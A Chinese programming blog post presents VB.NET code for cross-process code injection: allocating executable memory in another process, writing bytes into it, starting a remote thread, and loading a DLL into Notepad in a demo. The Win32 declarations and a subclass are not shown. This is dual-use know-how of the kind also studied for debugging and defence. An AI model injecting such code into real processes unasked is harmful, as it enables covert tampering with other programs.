
遠線程運行匯編代碼

編輯:關於.NET

VB.NET 2008 寫的代碼,主要是前幾天看人家寫的VB6什麼的代碼,運行起來 不錯,可改成VB.NET 2008一寫,直接壞事了,在XP系統D325的U上跑的都挺好, 可放到VISTA系統TK55的本子上,VB6的還行,.NET的直接非法。針對這個,完整 重寫了一下代碼。

簡單介紹步驟:

1、通過ID獲取進程句柄,並替它申請一塊內存:

'Open the target process by its PID (Process.GetProcessById throws for an unknown PID)
RemoteProcess = Process.GetProcessById (PID)
'Reserve and commit 4 KB (MEM_SIZE) of executable+writable memory inside the target.
'VirtualAllocEx returns 0 on failure; the value is stored here without being checked.
AllocBaseAddress = VirtualAllocEx (RemoteProcess.Handle, 0, MEM_SIZE, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE)

2、構建匯編代碼,這裡分兩種情況

A、添加代碼

'添加整型
    'Append a 32-bit integer to the code area (byte order per BitConverter, i.e. host order)
    Protected Sub AddInt2Code(ByVal Value As Integer)
        Dim bytes() As Byte = BitConverter.GetBytes(CInt (Value))    'raw bytes of the value
        Add2Memory(bytes, PtrAddressOffset)                          'write at the current code offset
        PtrAddressOffset += 4                                        'advance the code write offset
    End Sub
    '添加字節型
    'Append a single byte to the code area and advance the code write offset by one
    Protected Sub AddByte2Code(ByVal Value As Byte)
        Dim bytes(0) As Byte
        bytes(0) = Value
        Add2Memory(bytes, PtrAddressOffset)
        PtrAddressOffset += 1
    End Sub

    '添加字節數組
    'Append a byte array to the code area and advance the code write offset by its length.
    'Unlike AddData there is no size check here.
    Protected Sub AddBytes2Code(ByVal Value As Byte())
        Add2Memory(Value, PtrAddressOffset)
        PtrAddressOffset += Value.Length
    End Sub

B、添加數據

Add2Memory(Value, ObjAddressOffset)             'write the bytes into the data area of the remote buffer
            Dim odata As New mData                           'record where this item lives (remote address, length)
            odata.prt = ObjAddressOffset + AllocBaseAddress  'absolute address in the target process
            odata.len = Value.Length
            DataArraylist.Add(odata)
            ObjAddressOffset += Value.Length                 'advance the data write offset
            ObjAddressOffset += ObjAddressOffset Mod 4       'intended to round the offset up to a 4-byte boundary

3、運行

'運行
    'Start a thread in the target process at the beginning of the code area, wait for it
    'to finish and return its exit code. The wait is INFINITE, so a stub that never returns
    'blocks the caller. The thread handle is not closed anywhere in this listing; the local
    'ThreadHwnd shadows the field of the same name.
    Function Run() As Integer
        Dim lngRet As Integer
        'start address = base of the allocation (code offset 0), no thread parameter
        Dim ThreadHwnd = CreateRemoteThread (RemoteProcess.Handle, 0, 0, AllocBaseAddress, 0, 0, 0)
        WaitForSingleObject(ThreadHwnd, INFINITE)
        'lngRet is presumably a ByRef parameter in the (unlisted) Declare statement
        GetExitCodeThread(ThreadHwnd, lngRet)
        Return lngRet
    End Function

4、回收內存

'Release the remote allocation when the object is garbage-collected. This runs at a
'non-deterministic time on the finalizer thread, and On Error Resume Next hides any
'failure (e.g. the target process has already exited).
Protected Overrides Sub Finalize()
        On Error Resume Next
        VirtualFreeEx(RemoteProcess.Handle, AllocBaseAddress, MEM_AUTOFREE, MEM_RELEASE)    'free the memory allocated in the target
        MyBase.Finalize()
    End Sub

完畢~!~

完整代碼如下(注:下方列表未包含 VirtualAllocEx、WriteProcessMemory、CreateRemoteThread 等 Win32 函數的 Declare 聲明):

Imports System.Runtime.InteropServices
''' <summary>
''' Runs a small machine-code stub inside another process on a remote thread.
''' The remote buffer is limited to 4 KB (MEM_SIZE): the first 512 bytes hold
''' code, the remainder holds data (see ClearCodeAndData).
''' </summary>
''' <remarks>
''' The VirtualAllocEx(PAGE_EXECUTE_READWRITE) -> WriteProcessMemory ->
''' CreateRemoteThread sequence used here is the classic cross-process
''' code-injection pattern: it needs a process handle with the matching access
''' rights and is a common detection signature for endpoint-protection tooling.
''' Addresses and handles are declared as 32-bit Integer throughout. The
''' Declare statements for the Win32 functions are not part of this listing.
''' </remarks>
Public Class RunRemoteASMCode
    'Constants defined by this class
    Private Const MEM_SIZE As Integer = &H1000      'size of the remote allocation (4096 bytes)
    Private Const MEM_AUTOFREE As Integer = &H0     'dwSize for VirtualFreeEx; 0 with MEM_RELEASE frees the whole region
    Private Const INFINITE As Integer = -1          'WaitForSingleObject timeout: wait forever
    'Win32 constants (winnt.h values)
    Private Const MEM_COMMIT As Integer = &H1000               'allocation type: commit pages
    Private Const MEM_RESERVE As Integer = &H2000              'allocation type: reserve address range
    Private Const MEM_RELEASE As Integer = &H8000              'free type: release the region
    Private Const PAGE_EXECUTE_READWRITE As Integer = &H40     'page protection: read/write/execute

    Protected AllocBaseAddress As Integer           'base address of the remote allocation (VirtualAllocEx result)
    Protected ThreadHwnd As Integer                  'remote thread handle; never assigned here - Run() declares a local of the same name that shadows it
    Protected RemoteProcess As Process              'target process

    Protected PtrAddressOffset As Integer           'next free offset in the code area (bytes 0-511 of the allocation)
    Protected ObjAddressOffset As Integer           'next free offset in the data area (starts at 512, see ClearCodeAndData)

    Protected DataArraylist As New ArrayList        'one mData record (remote address, length) per AddData call

    ''' <summary>
    ''' Opens the target process and allocates its 4 KB code/data buffer.
    ''' </summary>
    ''' <param name="PID">Process id of the target process.</param>
    ''' <exception cref="Exception">
    ''' Any failure (unknown PID, no access to the process handle, ...) is
    ''' rethrown wrapped in a plain Exception with the original as InnerException.
    ''' </exception>
    Sub New(ByVal PID As Integer)
        Try
            'Resolve the target process (throws for an unknown PID)
            RemoteProcess = Process.GetProcessById(PID)
            'Reserve+commit 4 KB of executable+writable memory in the target.
            'VirtualAllocEx returns 0 on failure; the value is stored without a check.
            AllocBaseAddress = VirtualAllocEx (RemoteProcess.Handle, 0, MEM_SIZE, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE)
            'Reset the code/data write offsets
            ClearCodeAndData()
        Catch ex As Exception
            Throw New Exception("RunRemoteASMCode類初始化 錯誤", ex)
        End Try
    End Sub

    'Write Value into the remote allocation at AllocBaseAddress + AddressOffset.
    'The WriteProcessMemory result is ignored and no byte count is read back (last argument 0).
    Protected Sub Add2Memory(ByVal Value() As Byte, ByVal AddressOffset As Integer)
        WriteProcessMemory(RemoteProcess.Handle, AllocBaseAddress + AddressOffset, Value, Value.Length, 0)
    End Sub

    ''' <summary>
    ''' Appends a byte array to the data area and records its remote location.
    ''' </summary>
    ''' <param name="Value">Bytes to copy into the target process.</param>
    ''' <returns>
    ''' The offset (relative to the allocation base) where the data was written,
    ''' or -1 if it would extend past the end of the 4 KB region.
    ''' </returns>
    Protected Function AddData(ByVal Value() As Byte) As Integer
        If ObjAddressOffset + Value.Length > MEM_SIZE Then
            'data would not fit in the allocated region
            Return -1
        Else
            Dim ret As Integer = ObjAddressOffset
            Add2Memory(Value, ObjAddressOffset)              'write the bytes into the data area
            Dim odata As New mData                           'record where this item lives (remote address, length)
            odata.prt = ObjAddressOffset + AllocBaseAddress  'absolute address in the target process
            odata.len = Value.Length
            DataArraylist.Add(odata)
            ObjAddressOffset += Value.Length                 'advance the data write offset
            ObjAddressOffset += ObjAddressOffset Mod 4       'intended to round the offset up to a 4-byte boundary
            Return ret
        End If
    End Function
    'Append a 32-bit integer to the code area (byte order per BitConverter, i.e. host order)
    Protected Sub AddInt2Code(ByVal Value As Integer)
        Dim bytes() As Byte = BitConverter.GetBytes(CInt (Value))    'raw bytes of the value
        Add2Memory(bytes, PtrAddressOffset)                          'write at the current code offset
        PtrAddressOffset += 4                                        'advance the code write offset
    End Sub
    'Append a single byte to the code area
    Protected Sub AddByte2Code(ByVal Value As Byte)
        Dim bytes(0) As Byte
        bytes(0) = Value
        Add2Memory(bytes, PtrAddressOffset)
        PtrAddressOffset += 1
    End Sub
    'Append a byte array to the code area. Unlike AddData there is no size check here.
    Protected Sub AddBytes2Code(ByVal Value As Byte())
        Add2Memory(Value, PtrAddressOffset)
        PtrAddressOffset += Value.Length
    End Sub
    ''' <summary>
    ''' Starts a thread in the target process at the beginning of the code
    ''' area, waits for it to finish and returns its exit code.
    ''' </summary>
    ''' <returns>The exit code reported by GetExitCodeThread.</returns>
    ''' <remarks>
    ''' The wait is INFINITE, so a stub that never returns blocks the caller.
    ''' The thread handle is not closed anywhere in this listing (and a failed
    ''' CreateRemoteThread, which returns 0, is not detected). The local
    ''' ThreadHwnd shadows the field of the same name.
    ''' </remarks>
    Function Run() As Integer
        Dim lngRet As Integer
        'start address = base of the allocation (code offset 0), no thread parameter
        Dim ThreadHwnd = CreateRemoteThread (RemoteProcess.Handle, 0, 0, AllocBaseAddress, 0, 0, 0)
        WaitForSingleObject(ThreadHwnd, INFINITE)
        'lngRet is presumably a ByRef parameter in the (unlisted) Declare statement
        GetExitCodeThread(ThreadHwnd, lngRet)
        Return lngRet
    End Function
    'Reset code and data. The remote memory itself is not wiped - only the write
    'offsets are reset; the list of data records is actually cleared.
    Public Sub ClearCodeAndData()
        PtrAddressOffset = 0        'code area starts at the allocation base
        ObjAddressOffset = 512      'data area starts 512 bytes past the base
        DataArraylist.Clear()
    End Sub

    ''' <summary>
    ''' Releases the remote allocation when the object is garbage-collected.
    ''' </summary>
    ''' <remarks>
    ''' Runs at a non-deterministic time on the finalizer thread; On Error
    ''' Resume Next hides any failure (e.g. the target has already exited).
    ''' An IDisposable implementation would make the release explicit.
    ''' </remarks>
    Protected Overrides Sub Finalize()
        On Error Resume Next
        VirtualFreeEx(RemoteProcess.Handle, AllocBaseAddress, MEM_AUTOFREE, MEM_RELEASE)    'free the memory allocated in the target
        MyBase.Finalize()
    End Sub
    'Bookkeeping record for one item written to the data area
    Protected Class mData
        Public prt As Integer   'absolute address in the target process
        Public len As Integer   'length in bytes
    End Class
End Class

這樣就可以運行了。。。。沒想出來啥例子來,匯編本來就學得不咋地…… 而且寫這個主要是為了注入……

哦也~先到這裡。把一個小測試的結果貼來~倒霉的還是記事本~~~

恩~~~窗體的是這樣搞的

'Injector instance created on button click. RunRemoteAPI derives from RunRemoteASMCode
'but its body (CallRemoteAPIByName, BaseAddress, RotateProcess, RemoteBytesFromIndex,
'mFuncParam) is not part of this page; usage below is the only documentation.
Dim api As RunRemoteAPI
    'Demo handler: reads a PID from TextBox1, loads and unloads c:\test.dll in that process,
    'lists its modules before and after, then calls GetWindowTextW remotely on this form's
    'own window handle. CInt(TextBox1.Text) throws on non-numeric input; every failure ends
    'in the Catch below and is shown with MsgBox.
    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        Try
            api = New RunRemoteAPI(CInt(TextBox1.Text))
            'Private Declare Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long

            'returned module handle shown as hex; the path is passed as ASCII to match the "A" entry point
            TextBox3.Text = Hex(api.CallRemoteAPIByName ("kernel32", "LoadLibraryA", New mFuncParam (System.Text.ASCIIEncoding.ASCII.GetBytes("c:\test.dll"))))

            TextBox2.Text = Hex(api.BaseAddress)

            'list the target's modules (RotateProcess presumably exposes the target Process)
            For Each m As ProcessModule In Process.GetProcessById(api.RotateProcess.Id).Modules
                ListBox1.Items.Add(m.FileName)
            Next

            'Private Declare Function FreeLibrary Lib "kernel32" Alias "FreeLibrary" (ByVal hLibModule As Long) As Long
            'hex string from TextBox3 parsed back to the module handle
            api.CallRemoteAPIByName("kernel32", "FreeLibrary", New mFuncParam(CInt("&H" & TextBox3.Text)))

            'list the target's modules again
            For Each m As ProcessModule In Process.GetProcessById(api.RotateProcess.Id).Modules
                ListBox2.Items.Add(m.FileName)
            Next

            'Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
            'NOTE: the comment above names the "A" variant; the call below uses GetWindowTextW and decodes as Unicode.
            Dim s(255) As Byte    '256-byte output buffer copied into the remote data area

            api.CallRemoteAPIByName("user32", "GetWindowTextW", New mFuncParam(CInt(Me.Handle)), _
                                     New mFuncParam(s), _
                                     New mFuncParam(s.Length))
            'presumably reads back the buffer of parameter index 1 (s) from the target - verify against RunRemoteAPI
            Button1.Text = System.Text.Encoding.Unicode.GetString(api.RemoteBytesFromIndex(1))
        Catch ex As Exception
            MsgBox(ex.ToString)
        End Try
    End Sub

就是在上面的基礎上弄了一個這:

Public Class RunRemoteAPI : Inherits RunRemoteASMCode

基本還是可用的。。。還有一些不足,需要改進的,還沒弄好。。。
